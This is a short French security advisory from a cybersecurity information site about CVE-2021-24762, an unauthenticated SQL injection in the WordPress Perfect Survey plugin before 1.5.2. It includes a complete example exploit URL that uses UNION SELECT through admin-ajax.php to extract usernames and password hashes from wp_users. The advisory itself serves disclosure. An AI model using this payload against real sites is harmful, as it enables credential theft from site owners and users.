Faille CVE sur un plugin Wordpress Perfect Survey

logo perfect survey WordPress
En lire plus sur CVEDETAILS

Une faille critique CVE est exploitable sur le plugin WordPress Perfect Survey.

Pour info le plugin n’est plus disponible sur la plateforme wordpress à cause de la faille.

Les versions impactées sont celle < 1.5.2.

La version 1.5.2 fixe normalement le problème.

Nous sommes face à une faille de type injection SQL suite à une non vérification d’une variable sur une requête ajax.


Exemple d'atttaque sur la faille CVE Perfect Survey

				
					https://example.com/wp-admin/admin-ajax.php?action=get_question&question_id=1%20union%20select%201%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%20from%20wp_users
Information Valeur

CVE
CVE-2021-24762

CVE publié le

04/02/2022

Score
7.5

Fuite de données
Partielle

Intégrité Système
Partielle

Impact sur les ressources
Partielle

Compléxité
Facile

Authentification requise
Non

Vous avez besoin d'aide ?

Contactez nous !!!

6ber-network est un site francophone d’informations et de formations sur la Cyber-Sécurité.

  • Tutorials
  • Resources
  • Guides
  • Docs

A Propos

  • Community
  • Blog